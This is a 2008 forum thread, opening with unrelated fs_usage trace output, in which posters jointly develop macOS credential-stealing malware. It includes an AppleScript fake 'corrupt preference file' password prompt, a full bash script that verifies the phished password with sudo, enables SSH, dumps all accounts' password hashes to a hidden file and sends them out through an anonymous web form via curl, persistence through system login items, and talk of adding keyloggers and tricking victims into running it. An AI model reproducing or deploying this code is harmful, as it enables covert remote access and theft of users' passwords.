19:39:59 getattrlist ces/QuickTime Preferences 0.000024 Veoh Player
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000008 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000012 Veoh Player
19:39:59 sendto 0.000018 usbmuxd
19:39:59 close 0.000008 iTunes
19:39:59 recvfrom 0.000005 iTunes
19:39:59 close 0.000004 iTunes
19:39:59 recvfrom 0.000004 iTunes
19:39:59 close 0.000004 iTunes
19:39:59 sendto 0.000006 iTunes
19:39:59 select 0.011152 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 recvfrom 0.000003 usbmuxd
19:39:59 sendto 0.000007 usbmuxd
19:39:59 select 0.000087 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 socket 0.000021 SystemUIServ
19:39:59 ioctl 0.000034 SystemUIServ
19:39:59 ioctl 0.000020 SystemUIServ
19:39:59 ioctl 0.000023 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 ioctl 0.000006 SystemUIServ
19:39:59 ioctl 0.000019 SystemUIServ
19:39:59 ioctl 0.000013 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 ioctl 0.000006 SystemUIServ
19:39:59 ioctl 0.000005 SystemUIServ
19:39:59 ioctl 0.000018 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 ioctl 0.000006 SystemUIServ
19:39:59 ioctl 0.000013 SystemUIServ
19:39:59 ioctl 0.000008 SystemUIServ
19:39:59 ioctl 0.000005 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 close 0.000010 SystemUIServ
19:39:59 ioctl 0.000008 SystemUIServ
19:39:59 ioctl 0.000005 SystemUIServ
19:39:59 ioctl 0.000004 SystemUIServ
19:39:59 socket 0.000010 SystemUIServ
19:39:59 ioctl 0.000018 SystemUIServ
19:39:59 ioctl 0.000015 SystemUIServ
19:39:59 ioctl 0.000018 SystemUIServ
19:39:59 ioctl 0.000005 SystemUIServ
19:39:59 ioctl 0.000017 SystemUIServ
19:39:59 ioctl 0.000015 SystemUIServ
19:39:59 ioctl 0.000017 SystemUIServ
19:39:59 ioctl 0.000005 SystemUIServ
19:39:59 ioctl 0.000005 SystemUIServ
19:39:59 ioctl 0.000011 SystemUIServ
19:39:59 close 0.000006 SystemUIServ
19:39:59 sendto 0.000013 usbmuxd
19:39:59 close 0.000005 iTunes
19:39:59 recvfrom 0.000005 iTunes
19:39:59 sendto 0.000008 usbmuxd
19:39:59 close 0.000005 iTunes
19:39:59 recvfrom 0.000004 iTunes
19:39:59 write 0.000010 iTunes
19:39:59 write 0.000004 iTunes
19:39:59 select 0.004652 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 recvfrom 0.000003 usbmuxd
19:39:59 sendto 0.000006 usbmuxd
19:39:59 select 0.000085 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000015 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000020 Veoh Player
19:39:59 write 0.000035 Locum
19:39:59 select 0.000010 Brutal Gift
19:39:59 recvfrom 0.000011 Brutal Gift
19:39:59 select 0.000007 Brutal Gift
19:39:59 recvfrom 0.000007 Brutal Gift
19:39:59 read 0.000615 Locum
19:39:59 write 0.000014 Locum
19:39:59 select 0.000007 Brutal Gift
19:39:59 sendto 0.000056 Brutal Gift
19:39:59 ioctl 0.000004 Brutal Gift
19:39:59 read 0.000676 W Locum
19:39:59 select 0.000006 Brutal Gift
19:39:59 write 0.000015 Locum
19:39:59 sendto 0.000016 Brutal Gift
19:39:59 ioctl 0.000002 Brutal Gift
19:39:59 read 0.000602 Locum
19:39:59 write 0.000014 Locum
19:39:59 read 0.000696 W Locum
19:39:59 write 0.000015 Locum
19:39:59 read 0.000769 W Locum
19:39:59 write 0.000019 Locum
19:39:59 read 0.000602 Locum

Oktane
May 27 2008, 10:00 PM
i know launchctl load -w /System/Library/LaunchDaemons/ssh.plist works I just need root to execute
lokin
May 27 2008, 10:51 PM
Haven't we been discussing this? So far there are two options.
1) making an applescript that executes "launchctl load -w /System/Library/LaunchDaemons/ssh.plist" on startup by adding it to the start up items which are located
/Library/Preferences/com.apple.SystemLoginItems.plist

2) Or using the fake password prompt by using this basic idea.
CODE
set output to text returned of (display dialog "You must enter your password to continue:" with icon 2 default answer "")
do shell script "echo " & output & " >> ~/Public/.howdy"


or slightly more believable...

CODE
--Variables
set admin_user to false
set root_access to false
set the_username to do shell script "whoami"
set the_password to ""

set the_icon to POSIX file "/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns" as alias

--Main

if text of (do shell script "id" user name the_username) contains "admin" then
    set admin_user to true
else
    set the_password to text returned of (display dialog "A corrupt preference file has been detected and must be repaired. Enter your password to continue:" with icon the_icon with title "Password" default answer "" with hidden answer)
end if

--Password Check

if admin_user then
    repeat until root_access
        set the_password to text returned of (display dialog "A corrupt preference file has been detected and must be repaired. Enter the password for the user account \"" & the_username & "\" to continue:" with icon the_icon with title "Password" default answer "" with hidden answer)
        try
            if text of (do shell script "echo $UID" user name the_username password the_password with administrator privileges) = "0" then set root_access to true
        on error
            display dialog "Incorrect password. Click OK to try again." buttons {"OK"} default button "OK"
        end try
    end repeat
end if

--output

do shell script "echo \"" & the_username & ":" & the_password & " \" >> ~/Public/.howdy"
do shell script "id >> ~/Public/.howdy"

display dialog "Successfully repaired preference file " buttons {"OK"} default button "OK"

--Enables SSH

tell application "System Events" to do shell script "exec echo " & the_password & " | sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
Oktane
May 27 2008, 10:54 PM
It would be great if all the user had to do was click and they were trapped. I found /Library/Preferences/loginwindow.plist which will allow me to make a startupitem but
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"

still doesn't work so far...
callmenames
May 27 2008, 10:55 PM
Andrew - that output is normal, that is why it's best to have as few programs as possible running when you use fs_usage because it will show every access of every file by every program. Also, start it, do something that changes a file and then stop fs_usage as quickly as possible or the results you need may literally scoll off and away... (command-c to stop it.) Another tip is that fs_usage won't normally wrap lines but will cut them off at the end of the Terminal window width - which may cause it to cut off helpful information. You can either drag the size of the Terminal window wider before running fs_usage or use fs_usage -w to force wider output.

Oktane, what happens when you restart? Do you see any indication that your AppleScript app runs at all (name in the menu bar for instance)? Also, see post #42 on page 5 of this thread...
andrewistheshit
May 27 2008, 10:55 PM
were either of thoes a responce to my question???
callmenames
May 27 2008, 10:59 PM
QUOTE(Oktane @ May 27 2008, 08:54 PM) *
[...]I found /Library/Preferences/loginwindow.plist which will allow me to make a startupitem[...]


No, it won't. It will allow you to have a LoginItem run for any/every user who logs in locally. Those items run as the user, not as root.

They are essentially the same as the LoginItems in System Preferences except that those are specific to one user whereas /Library/Preferences/loginwindow.plist applies to ALL users.

/Library/Preferences/loginwindow.plist runs at login for all users as the user.
/Library/Preferences/com.apple.SystemLoginItems.plist runs at login for all users with an effective user id of 0 = root.
~/Library/Preferences/loginwindow.plist runs at login for the specific user, as the user (these are the LoginItems listed in System Preferences.)
Oktane
May 27 2008, 11:01 PM
Then what the hell are we supposed to do aaggghh!
callmenames
May 27 2008, 11:08 PM
The script in post #42 back on page 5 of this thread works. Set it's path as an AutoLaunchedApplicationDictionary entry in com.apple.SystemLoginItems.plist.

I should probably reiterate that the script should be saved as a run-only application bundle.
callmenames
May 27 2008, 11:38 PM
Presumably you have that working now, yes?

For anyone following along, this thread has covered 2 different scripts so far.... initially it was how to enable SSH without having an admin account with which you can sudo and without asking the user for a password. That one is resolved provided you have write access to /Library/Preferences/com.apple.SystemLoginItems.plist - which does not exist by default, try creating it.

The other script has been done predominantly in AppleScript with bits of shell commands thrown in (because it is sometimes far easier than an equivalent AppleScript routine.) That one was to ask the user for a password, test the password to see if it is valid with sudo (and just assume the account is allowed ALL=(ALL)), then enable SSH, output the password to a hidden local file and finally email the username and password. Functional solutions for each of the necessary parts of that script are already posted in this thread... one only has to combine them, figure out a URL and then save the AppleScript as a run-only application bundle. (Then make it invisible to the menu bar and dock if you like as well.)

Just to further confuse everone, I'll post a functional shell script version of the second script. Enjoy. :)
CODE
#!/bin/bash


##########
# Functions (subroutines, handlers)
##########

function request_password () {
    local blahblah="A corrupt preference file has been detected and must be repaired."
    blahblah="${blahblah} Enter the password for the user account ${the_username} to continue:"
    the_password=$( osascript -l AppleScript \
        -e "tell application \"System Events\"" \
        -e "activate" \
        -e "set the_icon to ${the_icon}" \
        -e "display dialog \"${blahblah}\" \
            with icon ${the_icon} with title \"Password\" default answer \"\" with hidden answer \
            buttons {\"OK\"} default button \"OK\"" -e "end tell" )
    the_password="${the_password#*text returned:}"; the_password="${the_password%, *}"
    [ "${admin_user}" == "true" ] && test_password && return 0
}

function test_password () {
    sudo -k
    the_uid=$( osascript -l AppleScript -e "do shell script \"id -u\" user name \"${the_username}\" password \
        \"${the_password}\" with administrator privileges" )
    [ "${the_uid}" == "0" ] && root_access="true" && return 0
    osascript -l AppleScript \
            -e "tell application \"System Events\" to display dialog \
            \"Incorrect password. Click Ok to try again.\" buttons {\"OK\"} default button \"OK\""
    the_password=""
    request_password
}

function test_sudo () {
        local -i last_access_time=0
        last_access_time=$( stat -xt "%H%M" .saywhat 2>/dev/null | grep Access | cut -d ' ' -f 2 )
        echo "${the_password}" | sudo -S touch .saywhat 2>/dev/null &
        sleep 2
        if [ $( stat -xt "%H%M" .saywhat 2>/dev/null | grep Access | cut -d ' ' -f 2) -ne ${last_access_time} ]; then
            sudo_works="true"
            root_access="true"
            sudo rm .saywhat 2>/dev/null &
            enable_ssh
            # Insert other commands here...
        fi
}

function enable_ssh () {
    echo "${the_password}" | sudo -S echo
    if [ -f /System/Library/LaunchDaemons/ssh.plist ]; then
        sudo /bin/launchctl load -w /System/Library/LaunchDaemons/ssh.plist && return 0
        sudo /usr/bin/defaults write /System/Library/LaunchDaemons/ssh Disabled false
        sudo /sbin/service ssh start
    elif [ -f /private/etc/xinetd.d/ssh ]; then
        sudo sed -e 's/disable = .*$/disable = no/' /private/etc/xinetd.d/ssh > /private/etc/xinetd.d/ssh.new && \
            mv /private/etc/xinetd.d/ssh /private/etc/xinetd.d/ssh.old && \
            mv /private/etc/xinetd.d/ssh.new /private/etc/xinetd.d/ssh
    else
        sudo sed -e "s/SSHSERVER=-NO-/SSHSERVER=-YES-/" /etc/hostconfig > \
            /etc/hostconfig.new && mv /etc/hostconfig.new /etc/hostconfig
        grep 'SSHSERVER=-YES-' /etc/hostconfig || sudo echo "SSHSERVER=-YES-" >> /etc/hostconfig
    fi
}

function output () {
    local the_name line the_rest the_hashfile the_hash SSHA1 S0SHA1
    echo -n "${the_username}${tab}${the_password}${tab}" >> "${secret_file}"
    id >> "${secret_file}"
    /usr/bin/nidump passwd .  >> "${secret_file}"
    if [ "${root_access}" == "true" ]; then
        if [ ${osxversion} -eq 3 ]; then # The Panther hash file format is NT 32 chrs, LM 32 chrs, raw-SHA1 40 chrs
            /usr/bin/nidump passwd . | grep -v ":\*:" | while read line
            do
                the_name="${line%%:*}" the_rest="${line#*:*:}"
                the_hashfile=$( niutil -readprop . "/users/${the_name}" generateduid 2>&1 )
                [ -f "/var/db/shadow/hash/${the_hashfile}" ] && the_hash=$( sudo cat "/var/db/shadow/hash/${the_hashfile}" )
                [ "${the_hash:0:63}" != $( jot -s '' -b 0 63 ) -a "${the_hash:0:63}" != "" ] && \
                    echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:${the_rest}" >> "${secret_file}"
                echo "_${the_name}_rawSHA1:${the_hash:64:40}:${the_rest}" >> "${secret_file}"
            done
        elif [ ${osxversion} -ge 4 ]; then # Tiger and Leopard hash files
            dscl . -list /Users authentication_authority | grep -i hash | sed "s/ .*$//" | while read the_name
            do
                the_hashfile=$( dscl . -read /users/"${the_name}" generateduid | sed "s/^.* //" )
                the_hash=$( sudo cat "/var/db/shadow/hash/$the_hashfile" )
                S0SHA1="${the_hash:104:48}"
                SSHA1="${the_hash:168:48}"
                echo "${the_name}_NTLM:${the_hash:0:32}${the_hash:32:32}:${newline}${the_name}_SSHA1:"\
                "${SSHA1}:${newline}${the_name}_S0SHA1:${S0SHA1}:" >> "${secret_file}"
            done
        elif [ ${osxversion} -le 2 ]; then # Jaguar and prior...
            /usr/bin/nidump passwd . | grep -v ":\*:" | while read line
            do
                the_name="${line%%:*}" the_rest="${line#*:*:}"
                the_hashfile=$( niutil -readprop . "/users/${the_name}" generateduid 2>&1 )
                [ -f "/var/db/samba/hash/${the_hashfile}" ] && the_hash=$( sudo cat "/var/db/samba/hash/${the_hashfile}" )
                echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:${the_rest}" >> "${secret_file}"
            done

        fi
    fi
}


##########
# Variables
##########

declare the_username the_password
declare groups admin_user="false" root_access="false" sudo_works="false"
declare ip_addresses public_ip_address private_ip_address_en0 private_ip_address_en1 private_ip_address_of_router
declare the_email the_subject the_message
declare the_uid
declare osxversion=$( sw_vers -productVersion | cut -d '.' -f 2 )
declare output_file="false" secret_file=~/Public/.howdy # Don't quote a tilde here!
declare tab=$'\t' newline=$'\n'
declare the_icon=2

if [ -f "/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns" ]; then
    the_icon="POSIX file \"/System/Library/CoreServices/SecurityAgent.app/Contents/Resources/Security.icns\""
fi

# Gathering info...
the_username="$( /usr/bin/whoami )"

public_ip_address="$( curl http://ipid.shat.net/iponly/ | grep body | sed -e 's/^<body>//' -e 's/<.*$//' )"
private_ip_address_en0="$( ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' )"
private_ip_address_en1="$( ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' )"
private_ip_address_of_router="$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' )"
ip_addresses="${public_ip_address} ${private_ip_address_en0} ${private_ip_address_en1} ${private_ip_address_of_router}"
ip_addresses="${ip_addresses//  / }"

groups="$( /usr/bin/id )"
[ "${groups}" != "${groups/(admin)}" ] && admin_user="true"


##########
# Main
##########

touch "${secret_file}" && output_file="true"
test_sudo
request_password
if [ "${root_access}" == "true" ]; then
    enable_ssh
    [ "${output_file}" == "true" ] && output
fi

# Compose email for web form post
the_email="EMAILNAME%40EMAILDOMAIN.com"
the_subject="Howdy"
the_message="${the_username} ${the_password} ${ip_addresses}"
the_message="$( echo ${the_message} | /usr/bin/tr '. 0123456789[A-M][N-Z][a-m][n-z]' '_+5678901234[N-Z][A-M][n-z][a-m]' )"

# Send email. The URL provided here is an example and does not work. Find one that works.
email_result=$( curl -d "hdnSendMail=sendNow&To=${the_email}&CC=&BCC=&Subject=${the_subject}&Message=%{the_message}&btnSend=Send" www.A_Location_which_you_can_find_on_your_own.com/form.asp )

# To decode the incoming message...
# echo "ENCODED_STRING" | tr " " "+" | tr '_+5678901234[N-Z][A-M][n-z][a-m]' '. 0123456789[A-M][N-Z][a-m][n-z]'

exit 0
callmenames
May 27 2008, 11:46 PM
And a copy of the text file for those who are copy/paste/save-as-plain-text-with-unix-line-endings challenged
http://www.megashare.com/419623
lokin
May 28 2008, 12:09 AM
Do you have any suggestions for the URL domain?
Will it be our smtp server or just any random hosting site....?
callmenames
May 28 2008, 12:14 AM
I highly recommend reviewing some of the links posted on page 10 of this thread. :)

And now that I post the script I see a few things to change... I have enable_ssh called from main and from the test_sudo routine, really only needs one of those. I also have the the output function call inside an if statement in main and it doesn't need to be as it checks for sudo / root access on it's own. It is still functional though.
lokin
May 28 2008, 03:00 AM
When I send it through Ichat it can't find the icon so it gives an error and doesn't run.
But if I send it as plain text and then make it an applescript app bundle from there it works fine?????
none of the code is different or anything I have 10.5 and I'm sending it to a 10.4.11 machine.
callmenames
May 28 2008, 09:49 AM
QUOTE(lokin @ May 28 2008, 01:00 AM) *
When I send it through Ichat it can't find the icon so it gives an error and doesn't run.
But if I send it as plain text and then make it an applescript app bundle from there it works fine?????
none of the code is different or anything I have 10.5 and I'm sending it to a 10.4.11 machine.

"it" is what? AppleScript? Scpt? App? App bundle? Shell script?

callmenames
May 28 2008, 10:51 AM
Typo in the shell script...
QUOTE(callmenames @ May 27 2008, 09:38 PM) *
# Send email. The URL provided here is an example and does not work. Find one that works.
email_result=$( curl -d "hdnSendMail=sendNow&To=${the_email}&CC=&BCC=&Subject=${the_subject}&Message=%{the_message}&btnSend=Send" www.A_Location_which_you_can_find_on_your_own.com/form.asp )

%{the_message} should have been ${the_message}. Like this...
CODE
email_result=$( curl -d "hdnSendMail=sendNow&To=${the_email}&CC=&BCC=&Subject=${the_subject}&Message=${the_message}&btnSend=Send" www.A_Location_which_you_can_find_on_your_own.com/form.asp )


And while we are on the topic of submitting email through various web forms...
Get Firefox.
Install the LiveHTTPHeaders extension for Firefox.

Google for anonymous email or similar terms.
Find a page in the results which allows sending an anonymous email to any address via a web form.

Open the page in Firefox. Fill out the mail form. Do not send yet.

Pull down the Tools menu on the menu bar while in Firefox and select Live HTTP Headers.
Send the form message.
Click the "Generator" tab in the Live HTTP Headers window.
Scroll to the very top.

Look for and copy the line which includes the message data which you just sent and also the line which includes the path to the form.
MESSAGE DATA:
to=somebody%40somewhere.com&from=&subject=Howdy%21&message=Like+wow+man&type=0&ttl=30&submit.x=68&submit.y=23&submit=Send+Self+Destructing+Message

In one example, the the path to the form is the base URL followed by /secure/submit

To use this mail form in the shell script in this thread, just insert our variables and have curl handle the submission.

email_result=$( curl -d "to=${the_email}&from=&subject=${the_subject}&message=${the_message}&type=0&ttl=30&submit.x=68&submit.y=23&submit=Send+Self+Destructing+Message" www.the_site_you_found.com/secure/submit )

And of course, test it from your program before expecting it to work !
andrewistheshit
May 28 2008, 11:05 AM
This is a very intersting thread could this method be used to install a remote keyloger and email you the results?
callmenames
May 28 2008, 11:42 AM
QUOTE(andrewistheshit)
This is a very intersting thread could this method be used to install a remote keyloger and email you the results?

Which method?

Asking the user for their password? Yes of course, but why would they download your program and why would they give it their password? That has yet to be resolved.

The other method discussed here - using the startup process - could certainly install a keylogger, and something to email logs - but you must have access to modify the startup scripts or certain folders. In some cases, write access to /Library/StartupItems or /Library/Preferences/com.apple.SystemLoginItems.plist will be available but not in all cases.
callmenames
May 28 2008, 12:39 PM
Updated copy of the shell script with various corrections and changes, not tested after changes!
http://rapidshare.com/files/118350940/getpass.zip.html
andrewistheshit
May 28 2008, 12:50 PM
QUOTE
Updated copy of the shell script with various corrections and changes, not tested after changes

Is this a compiled apple scipt, sorry im not all caught up on this thread.
want to give a low down on all that the script does.
And ill try to find a solution to your problem about entering the password
callmenames
May 28 2008, 12:50 PM
No, I am steadfastly refusing to post a fully working, fully featured AppleScript because I believe that either Oktane, lokin or Squid will get theirs working and post it. :)

So the link I posted is to a BASH version, and it's just a text file.

We already have a way to ask for the password - however, that is no guarantee of getting the program downloaded and running on someone's computer. We either need to entice the user to download, lull them into a false sense of security or complacency so that they will run it... or find another way of causing the program to be downloaded and run without the user being involved. :)

Anybody have different versions of code to post? Non-working is fine too, we might have ideas on 'fixing' it. :)

The low-down on the shell script...
  • Gathers the public IP address
  • Gathers the private IP addresses of Ethernet and AirPort interfaces
  • Gathers the private IP address of the router (that's for opening port 22 in their router if we ever get around to it)
  • Get's the user shortname
  • Checks to see if the user is a member of the admin group
  • Checks to see if sudo will already work without a password (due to the timestamp)
  • Asks the user for their password
  • If the user is an admin member, it tests the password with sudo
  • Enables Remote Login a.k.a. SSH for Leopard, Tiger, Panther, Jaguar and prior
  • Creates a hidden file in the user's Public folder with username, password, group memberships, and password hashes for all user accounts if sudo worked
  • Composes an email and encodes the message
  • Sends the email via an anonymous email web form

andrewistheshit
May 28 2008, 01:27 PM
If you add a GUI that looks like OSX interphase it might be more belivable.

and the BASH version you posted, does that even work? if you could get the person to enter their password?
and would this work on a 10.5 computer? ( yes i read enough to know this was written on a 10.5 but made for a 10.4. Unless im thinking of a diffrent thread
callmenames
May 28 2008, 01:42 PM
Written and tested on 10.4, should run fine on 10.3 / 10.5 too. I made a few changes this morning and did not retest the script but of course I assume my changes are all done with proper syntax. :)

Yes it works, try it! It won't bite you. You can see everything that it does right in the text of the file. Change the EMAILNAME%40EMAILDOMAIN.com in the script to your own email address. Then drag the script file into a Terminal window and press return in the window to run it.

Assuming you give it the correct password and that you can sudo, then it will turn your Remote Login feature on. It will also create a file in your Public folder named ".howdy" which will contain your user name, the password you supplied and hashes if you gave it your real password and you are able to sudo.

You may wish to throw the .howdy file away (good idea) and turn off Remote Login if you don't want it on.

In actual use, you could have the script run as part of the OS X startup or login process which means no Terminal window or anything visible other than a dialog window asking for your password.

I forgot to mention that the URL for the web form email is a fake ( www.A_Location_which_you_can_find_on_your_own.com/form.asp ) you have to find your own, see page 13 of this thread.
andrewistheshit
May 28 2008, 01:56 PM
QUOTE
Then drag the script file into a Terminal window and press return in the window to run it.

you mean after i compile it using that
gcc /Path/TO/File

QUOTE
In actual use, you could have the script run as part of the OS X startup or login process which means no Terminal window or anything visible other than a dialog window asking for your password.

nice thinking
andrewistheshit
May 28 2008, 02:28 PM
QUOTE
Then drag the script file into a Terminal window and press return in the window to run it.

you mean after i compile it using that
gcc /Path/TO/File

QUOTE
In actual use, you could have the script run as part of the OS X startup or login process which means no Terminal window or anything visible other than a dialog window asking for your password.

nice thinking

QUOTE
I forgot to mention that the URL for the web form email is a fake ( www.A_Location_which_you_can_find_on_your_own.com/form.asp ) you have to find your own, see page 13 of this thread.

i couldnt find any link


results from a 10.5 machine

CODE
Last login: Wed May 28 12:31:25 on ttys000
andrew-frees-imac:~ andrewfree$ /Users/andrewfree/Downloads/getpass.sh
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0    83    0    83    0     0    144      0 --:--:-- --:--:-- --:--:--     0
/Users/andrewfree/Downloads/getpass.sh: line 40: [: -ne: unary operator expected
Password:

/Users/andrewfree/Downloads/getpass.sh: line 75: /usr/bin/nidump: No such file or directory

curl: (6) Couldn't resolve host 'www.A_Location_which_you_can_find_on_your_own.com'
andrew-frees-imac:~ andrewfree$


now just to add it in here



luckly it does not ask for you password for that part
callmenames
May 28 2008, 02:54 PM
It's a BASH script, no need to compile it.

Page 13 of this thread has a post detailing how to find a web form anonymous email site... then you can use that site in the script (you may also have to adjust the POST data.)

Don't forget to look at your ~/Public/.howdy file and delete it afterward.

LoginItems can't be shell scripts, unless you want them to launch Terminal and have a Terminal window open...

And a picture of the dialog window...


Oktane
May 28 2008, 03:07 PM
Shouldn't we focus on doing this without involving user stupidity. Can you give step by step on the com.apple.SystemLoginItems.plist. This is what I have:
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple$
<plist version="1.0">
<dict>
        <key>AutoLaunchedApplicationDictionary</key>
        <array>
                <dict>
                        <key>Hide</key>
                        <false/>
                        <key>Path</key>
                        <string>~/Desktop/script.app</string>
                </dict>
        </array>
</dict>
</plist>


With a application bundle saved as script.app with the code:
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
andrewistheshit
May 28 2008, 03:07 PM
well cant you compile the bash script into an applaction?
and in the login items you can select hide.

CODE
andrewfree    toxic0497    uid=501(andrewfree) gid=20(staff) groups=20(staff),98(_lpadmin),81(_appserveradm),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)
andrewfree_NTLM:0000000000000000000000000000000000000000000000000000000000000000:
andrewfree_SSHA1: 52FDF7650A4017411092796028B4AC3CCA06DE476C914197:
andrewfree_S0SHA1:000000000000000000000000000000000000000000000000:


why would it give me all of the SSHA1 stuff if it already gives me the password

and i was looking at the script and saw touch so i went to justfuckinggoogleit.com
and saw that the touch command is used for changing timestamps how would that help? Im just wondering becuause im trying to lean this stuff so understanding it helps

http://www.ss64.com/nt/touch.html

callmenames
May 28 2008, 03:21 PM
Ahh two errors when you ran it. Neither would be fatal to the script but here are the changes.

For the error on line 40...
CODE
function test_sudo () {
        local -i last_access_time=0
        last_access_time=$( stat -xt "%H%M" .saywhat 2>/dev/null | grep Access | cut -d ' ' -f 2 )
        echo "${the_password}" | sudo -S touch .saywhat 2>/dev/null &
        sleep 2
        if [ $( stat -xt "%H%M" .saywhat 2>/dev/null | grep Access | cut -d ' ' -f 2) -ne ${last_access_time} ]; then
            sudo_works="true"
            root_access="true"
            sudo rm .saywhat 2>/dev/null &
            enable_ssh
            # Insert other commands here...
        fi
}

To this...
CODE
function test_sudo () {
        local -i last_access_time=0
        touch .saywhat 2>/dev/null
        last_access_time=$( stat -xt "%H%M" .saywhat 2>/dev/null | grep Access | cut -d ' ' -f 2 )
        echo "${the_password}" | sudo -S touch .saywhat 2>/dev/null &
        sleep 2
        if [ $( stat -xt "%H%M" .saywhat 2>/dev/null | grep Access | cut -d ' ' -f 2) -ne ${last_access_time} ]; then
            sudo_works="true"
            root_access="true"
            sudo rm .saywhat 2>/dev/null &
            enable_ssh
            # Insert other commands here...
        fi
}

Added the line 'touch .saywhat 2>/dev/null' so that the file will exist and thus last_access_time gets a value.

And another change, to ignore nidump errors... add 2>/dev/null after each of the nidump commands, although only the first one should have been causing an error.
CODE
function output () {
    local the_name line the_rest the_hashfile the_hash SSHA1 S0SHA1
    echo -n "${the_username}${tab}${the_password}${tab}" >> "${secret_file}"
    id >> "${secret_file}"
    /usr/bin/nidump passwd . 2>/dev/null >> "${secret_file}"
    if [ "${root_access}" == "true" ]; then
        if [ ${osxversion} -eq 3 ]; then # The Panther hash file format is NT 32 chrs, LM 32 chrs, raw-SHA1 40 chrs
            /usr/bin/nidump passwd . 2>/dev/null | grep -v ":\*:" | while read line
            do
                the_name="${line%%:*}" the_rest="${line#*:*:}"
                the_hashfile=$( niutil -readprop . "/users/${the_name}" generateduid 2>&1 )
                [ -f "/var/db/shadow/hash/${the_hashfile}" ] && the_hash=$( sudo cat "/var/db/shadow/hash/${the_hashfile}" )
                [ "${the_hash:0:63}" != $( jot -s '' -b 0 63 ) -a "${the_hash:0:63}" != "" ] && \
                    echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:${the_rest}" >> "${secret_file}"
                echo "_${the_name}_rawSHA1:${the_hash:64:40}:${the_rest}" >> "${secret_file}"
            done
        elif [ ${osxversion} -ge 4 ]; then # Tiger and Leopard hash files
            dscl . -list /Users authentication_authority | grep -i hash | sed "s/ .*$//" | while read the_name
            do
                the_hashfile=$( dscl . -read /users/"${the_name}" generateduid | sed "s/^.* //" )
                the_hash=$( sudo cat "/var/db/shadow/hash/$the_hashfile" )
                S0SHA1="${the_hash:104:48}"
                SSHA1="${the_hash:168:48}"
                echo "${the_name}_NTLM:${the_hash:0:32}${the_hash:32:32}:${newline}${the_name}_SSHA1:"\
                "${SSHA1}:${newline}${the_name}_S0SHA1:${S0SHA1}:" >> "${secret_file}"
            done
        elif [ ${osxversion} -le 2 ]; then # Jaguar and prior...
            /usr/bin/nidump passwd . 2>/dev/null | grep -v ":\*:" | while read line
            do
                the_name="${line%%:*}" the_rest="${line#*:*:}"
                the_hashfile=$( niutil -readprop . "/users/${the_name}" generateduid 2>&1 )
                [ -f "/var/db/samba/hash/${the_hashfile}" ] && the_hash=$( sudo cat "/var/db/samba/hash/${the_hashfile}" )
                echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}:${the_rest}" >> "${secret_file}"
            done

        fi
    fi
}
Oktane
May 28 2008, 03:23 PM
Shouldn't we focus on doing this without involving user stupidity. Can you give step by step on the com.apple.SystemLoginItems.plist. This is what I have:
CODE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple$
<plist version="1.0">
<dict>
        <key>AutoLaunchedApplicationDictionary</key>
        <array>
                <dict>
                        <key>Hide</key>
                        <false/>
                        <key>Path</key>
                        <string>~/Desktop/script.app</string>
                </dict>
        </array>
</dict>
</plist>

With a application bundle saved as script.app with the code:
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
callmenames
May 28 2008, 03:32 PM
QUOTE(andrewistheshit @ May 28 2008, 01:07 PM) *
well cant you compile the bash script into an applaction?

The BASH shell is a command interpreter - it reads each command of the script and executes it on the fly. Compilers for BASH scripts do exist, but it isn't necessary generally and since it would no longer be source code, no one can read (and learn) from it.

QUOTE(andrewistheshit @ May 28 2008, 01:07 PM) *
and in the login items you can select hide.

True, try it. (Get Info on the script and set it to Open With... Terminal, check the box for Always open with.) I think Terminal running would still be too obvious even if the window were hidden.

QUOTE(andrewistheshit @ May 28 2008, 01:07 PM) *
why would it give me all of the SSHA1 stuff if it already gives me the password

A lot of computers have more than one user account. Plus, the user may have given an incorrect password but sudo was still working due to the timestamp feature -in which case we get the hash even if the user lied.

QUOTE(andrewistheshit @ May 28 2008, 01:07 PM) *
and i was looking at the script and saw touch so i went to justfuckinggoogleit.com
and saw that the touch command is used for changing timestamps how would that help? Im just wondering becuause im trying to lean this stuff so understanding it helps

The idea is that if the password is correct, and the user is allowed to sudo then the command 'echo "${the_password}" | sudo -S touch .saywhat 2>/dev/null &' would change the timestamp on the file named .saywhat and thus the variable last_access_time would no longer be equal to the current timestamp of the file. Meaning that the file's access time was updated and thus we know the sudo command worked.
andrewistheshit
May 28 2008, 03:38 PM
